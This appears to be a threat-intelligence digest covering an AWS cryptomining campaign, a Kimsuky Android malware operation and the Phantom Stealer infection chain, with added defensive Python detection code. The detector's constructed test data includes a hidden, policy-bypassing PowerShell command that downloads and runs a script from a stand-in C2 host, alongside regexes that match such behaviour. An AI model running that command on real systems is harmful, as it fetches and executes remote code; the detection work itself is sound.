Ongoing Cryptomining Campaign Targeting EC2 and ECS via Compromised IAM Credentials
Amazon’s AWS GuardDuty security team has identified an active cryptomining campaign targeting AWS customer environments by abusing valid, compromised IAM credentials rather than exploiting a software vulnerability. The operation began on November 2 and transitioned to cryptomining within roughly 10 minutes of initial access, after the actor conducted reconnaissance of EC2 service quotas and IAM permissions. The threat actor registered an ECS task definition referencing a Docker Hub image (yenik65958/secret) created on October 29, which contained the SBRMiner-MULTI cryptominer and an automated startup script; the image reportedly exceeded 100,000 pulls before removal. For ECS, the attacker configured Fargate tasks with 16,384 CPU units and 32 GB of memory each and set a desired count of 10 to scale mining capacity rapidly.

AWS observed a notable persistence and response-friction technique in this campaign: the attacker used ModifyInstanceAttribute to turn on termination protection (disabling API termination) across the launched EC2 instances, forcing defenders to remove the protection explicitly before each instance could be shut down. Termination protection is a legitimate safety feature intended to prevent accidental deletion; here it was used to delay containment, disrupt automated remediation, and extend the time available for mining.

After identifying the activity, AWS notified impacted customers, emphasized the need to rotate the compromised IAM credentials, and indicated that the Docker Hub image had been removed, while warning that similar images could reappear under different names or accounts. This activity creates direct financial exposure through compute exhaustion, potential service instability from quota saturation, and operational disruption, as responders must unwind auto-scaling and persistence controls before full termination.
Recommended actions include immediately rotating and invalidating any potentially exposed IAM access keys; reviewing CloudTrail for anomalous ECS task definitions, launch templates, and scaling events; and implementing tighter IAM least-privilege controls, strong credential hygiene, and automated guardrails that block unauthorized compute provisioning and remove attacker-set termination protection during incident response.
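As an added example (not AWS's or GuardDuty's own tooling), the following triage pass runs the CloudTrail review recommended above over constructed records: it flags termination protection being switched on, task definitions pulling from outside a trusted registry or requesting oversized CPU, and large service scale-outs, then measures how long each principal spent between its first call and its first flagged action. The account ID, ARNs, instance ID, thresholds and registry prefix are assumptions.

```python
from datetime import datetime

TRUSTED_REGISTRY_PREFIX = "111122223333.dkr.ecr."  # constructed: your own ECR account prefix
MAX_TASK_CPU = 4096       # constructed threshold; the campaign used 16384 (the Fargate maximum)
MAX_DESIRED_COUNT = 3     # constructed threshold; the campaign set desiredCount to 10

# Constructed CloudTrail-style records, not real logs. requestParameters follows the
# shape CloudTrail records for each call; the image name is the one cited in the report.
ATTACKER = {"arn": "arn:aws:iam::111122223333:user/ci-deploy"}
DEPLOYER = {"arn": "arn:aws:iam::111122223333:role/release-pipeline"}
EVENTS = [
    {"eventTime": "2025-11-02T10:00:00Z", "eventName": "DescribeAccountAttributes", "userIdentity": ATTACKER},
    {"eventTime": "2025-11-02T10:08:00Z", "eventName": "RegisterTaskDefinition", "userIdentity": ATTACKER,
     "requestParameters": {"family": "secret", "cpu": "16384", "memory": "32768",
                           "containerDefinitions": [{"image": "yenik65958/secret:latest"}]}},
    {"eventTime": "2025-11-02T10:09:00Z", "eventName": "CreateService", "userIdentity": ATTACKER,
     "requestParameters": {"serviceName": "secret", "launchType": "FARGATE", "desiredCount": 10}},
    {"eventTime": "2025-11-02T10:10:00Z", "eventName": "ModifyInstanceAttribute", "userIdentity": ATTACKER,
     "requestParameters": {"instanceId": "i-0123456789abcdef0", "disableApiTermination": {"value": True}}},
    {"eventTime": "2025-11-02T11:00:00Z", "eventName": "RegisterTaskDefinition", "userIdentity": DEPLOYER,
     "requestParameters": {"family": "web", "cpu": "512", "containerDefinitions":
                           [{"image": "111122223333.dkr.ecr.us-east-1.amazonaws.com/web:1.2"}]}},
]

def findings(event):
    """Return finding strings for one record; an empty list means nothing of interest."""
    name, p = event["eventName"], event.get("requestParameters") or {}
    who, out = event["userIdentity"].get("arn", "unknown"), []
    if name == "ModifyInstanceAttribute" and (p.get("disableApiTermination") or {}).get("value"):
        out.append(f"termination protection enabled on {p.get('instanceId')} by {who}")
    elif name == "RegisterTaskDefinition":
        images = [c.get("image", "") for c in p.get("containerDefinitions", [])]
        untrusted = [i for i in images if not i.startswith(TRUSTED_REGISTRY_PREFIX)]
        if untrusted or int(p.get("cpu", 0)) > MAX_TASK_CPU:
            out.append(f"task definition {p.get('family')} cpu={p.get('cpu')} images={untrusted} by {who}")
    elif name in ("CreateService", "UpdateService") and int(p.get("desiredCount", 0)) > MAX_DESIRED_COUNT:
        out.append(f"{name} desiredCount={p['desiredCount']} on {p.get('serviceName')} by {who}")
    return out

def triage(events):
    """Group findings by principal; record minutes from its first call (recon) to its first flagged action."""
    first_seen, report = {}, {}
    for e in sorted(events, key=lambda e: e["eventTime"]):
        who = e["userIdentity"].get("arn", "unknown")
        ts = datetime.strptime(e["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        first_seen.setdefault(who, ts)
        for f in findings(e):
            r = report.setdefault(who, {"minutes_to_first_finding": (ts - first_seen[who]).total_seconds() / 60, "findings": []})
            r["findings"].append(f)
    return report
```

The release-pipeline role never appears in the report, so a principal with only in-policy activity produces no noise; the compromised user shows all three behaviours within minutes of its reconnaissance call.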
Kimsuky Mobile Malware Campaign Leveraging Weaponized QR Codes and Delivery Service Impersonation
Threat researchers have identified a sophisticated mobile malware campaign attributed to the North Korea–linked threat actor Kimsuky, leveraging weaponized QR codes and fraudulent delivery service lures to distribute Android remote access trojans. The ENKI WhiteHat Threat Research Team analyzed a new iteration of the DOCSWAP malware, delivered via phishing messages containing malicious URLs that dynamically alter content based on device type. Victims who accessed the links from desktop systems were presented with QR codes prompting mobile access, while Android users were redirected to distribution servers hosting malicious APKs disguised as legitimate security or delivery applications. The infrastructure included fake delivery-tracking pages impersonating major logistics brands, including CJ Logistics, and malware hosted on servers such as 27[.]102[.]137[.]181. Researchers identified three additional malicious applications and seven command-and-control servers using APK metadata, infrastructure overlap, and shared JARM fingerprints. The distribution workflow employed server-side logic to selectively serve malware to Android devices while logging download attempts and transmission data for operational tracking.

The primary malicious application, SecDelivery[.]apk, implements a two-stage infection process that reflects a notable evolution in Kimsuky’s mobile tradecraft. Upon execution, the app decrypts an embedded secondary APK using a newly developed native decryption routine incorporating bit inversion, 5-bit rotation, and XOR encryption, replacing earlier, less sophisticated Java-based techniques. To maintain user deception, the app presents a fake authentication screen that requests a hardcoded delivery tracking number while malicious activity runs in the background.
Attribution to Kimsuky is reinforced by infrastructure overlap with known Naver phishing campaigns, reused parameter structures, Korean-language code comments, and the recurring “Million OK!!!!” signature string tied to prior operations. Organizations should enforce strict mobile application vetting and permission controls, deploy mobile threat defense solutions, and provide targeted user education focused on QR-based phishing and mobile social engineering tactics to mitigate this evolving threat.
Update: Phantom Stealer v3.5 Advances with Multi-Stage Malware Techniques
Phantom Stealer, a sophisticated information-stealing malware variant, is actively conducting targeted attacks designed to exfiltrate a broad range of sensitive data from compromised systems, including credentials, financial information, and cryptocurrency assets. Security researchers have identified version 3.5 of the malware, which employs a complex multi-stage infection chain and advanced evasion mechanisms to bypass modern security controls. The attack chain begins with a deceptive file masquerading as an “Adobe 11.7.7 installer,” first observed on VirusTotal on October 29, 2025, delivered as an obfuscated XML file containing embedded JavaScript. Upon execution, the script contacts a remote command server to download and execute a PowerShell script, “floor.ps1,” using hidden-window execution parameters and a bypassed PowerShell execution policy. This script decrypts RC4-encrypted payloads that reveal a malicious .NET injector DLL, BLACKHAWK[.]dll, which performs in-memory process injection. By loading the final stealer payload into the legitimate Aspnet_compiler.exe process and abusing .NET AppDomain isolation, Phantom significantly reduces its on-disk footprint and evades file-based detection mechanisms.

Once deployed, Phantom Stealer demonstrates extensive data harvesting and surveillance capabilities that pose a serious risk to both individuals and enterprises. The malware extracts AES master keys from Chromium-based browsers, enabling the decryption of stored passwords, cookies, autofill data, and payment information from browsers such as Chrome and Edge. It additionally targets cryptocurrency wallet credentials, desktop wallet data, Discord accounts, Outlook email content, Wi-Fi credentials, and detailed system and network information. Phantom incorporates keylogging that reconstructs typed content by tracking delimiters, such as spaces and return keys, further enhancing the accuracy of credential theft.
To evade detection, the malware performs rigorous anti-analysis checks against a hardcoded list of 112 sandbox and analyst usernames and triggers a self-destruct routine when analysis conditions are detected. Most notably, Phantom leverages the Heaven’s Gate technique to execute 64-bit native syscalls from a 32-bit process, bypassing x86 user-mode hooks and operating beneath the visibility of many endpoint security tools. Organizations should enforce strict software download validation, deploy robust endpoint detection and response capabilities with behavioral monitoring, and maintain disciplined patching and user awareness programs to reduce exposure to advanced stealer malware of this caliber.
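As an added example (not code from the researchers who analyzed Phantom), the following behavioural check turs the two telemetry-visible steps of the chain above into process-tree rules: a hidden, execution-policy-bypassing PowerShell that downloads a script, and Aspnet_compiler.exe started by something other than a build or IIS parent. The Sysmon-style records, the C2 hostname and the parent allowlist are constructed.

```python
import re

# Constructed Sysmon-style process-creation records, not real telemetry. The command line
# mirrors the hidden-window, execution-policy-bypass download of floor.ps1 described above.
EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 520, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/floor.ps1')\""},
    {"pid": 588, "ppid": 520, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "cmdline": "aspnet_compiler.exe"},
    {"pid": 700, "ppid": 1, "image": r"C:\Program Files\MSBuild\msbuild.exe", "cmdline": "msbuild.exe site.sln"},
    {"pid": 710, "ppid": 700, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "cmdline": "aspnet_compiler.exe -v / -p C:\\site"},
    {"pid": 800, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ep bypass -File C:\\scripts\\deploy.ps1"},
]

HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
BYPASS = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://\S+\.ps1", re.I)
# Constructed allowlist: parents from which aspnet_compiler.exe is expected to be launched.
EXPECTED_ASPNET_PARENTS = {"msbuild.exe", "devenv.exe", "w3wp.exe"}

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def detect(events):
    """Walk the process list and return (rule, pid, parent image) hits for the two
    behaviours: a hidden, policy-bypassing PowerShell that downloads a script, and
    aspnet_compiler.exe started by something other than a build or IIS process."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, cmd = basename(e["image"]), e.get("cmdline", "")
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else "unknown"
        if img in ("powershell.exe", "pwsh.exe") and HIDDEN.search(cmd) and BYPASS.search(cmd) and DOWNLOAD.search(cmd):
            hits.append(("hidden_bypass_download", e["pid"], pimg))
        if img == "aspnet_compiler.exe" and pimg not in EXPECTED_ASPNET_PARENTS:
            hits.append(("aspnet_compiler_unexpected_parent", e["pid"], pimg))
    return hits
```

The administrator's `-ep bypass -File deploy.ps1` run and the MSBuild-launched compiler are deliberately left unflagged, so the rules key on the combination of behaviours rather than on any single flag.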